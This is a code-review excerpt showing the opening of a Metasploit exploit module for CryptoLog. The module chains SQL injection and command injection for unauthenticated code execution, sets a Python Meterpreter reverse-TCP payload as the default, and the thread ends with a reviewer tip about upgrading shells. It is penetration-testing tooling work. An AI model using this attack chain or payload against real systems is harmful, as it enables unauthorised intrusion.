modules/exploits/linux/http/cryptolog_exec.rb

```diff
@@ -0,0 +1,117 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "CryptoLOG Remote Code Execution",
+      'Description'    => %q{
+        This module exploits the sql injection and command injection vulnerability of CryptoLog. An un-authenticated user can execute a
+        terminal command under the context of the web user.
+
+        login.php endpoint is responsible for login process. One of the user supplied parameter is used by the application without input validation
+        and parameter binding. Which cause a sql injection vulnerability. Successfully exploitation of this vulnerability gives us the valid session.
+
+        logshares_ajax.php endpoint is repsonsible for executing a operation system command. It's not possible to access this endpoint without having
+        a valid session. One user parameter is used by the application while executing operating system command which cause a command injection issue.
+
+        Combining these vulnerabilities gives us opportunity execute operation system command under the context of the web user.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://pentest.blog/advisory-cryptolog-unauthenticated-remote-code-execution/']
+        ],
+      'DefaultOptions'  =>
+        {
+          'Payload'  => 'python/meterpreter/reverse_tcp'
+        },
+      'Platform'       => ['python'],
+      'Arch'           => ARCH_PYTHON,
```

Comment:
Sure, but what if my target doesn't come with Python?
You can always use the magical "shell2meterpreter" module once you've got a shell ;)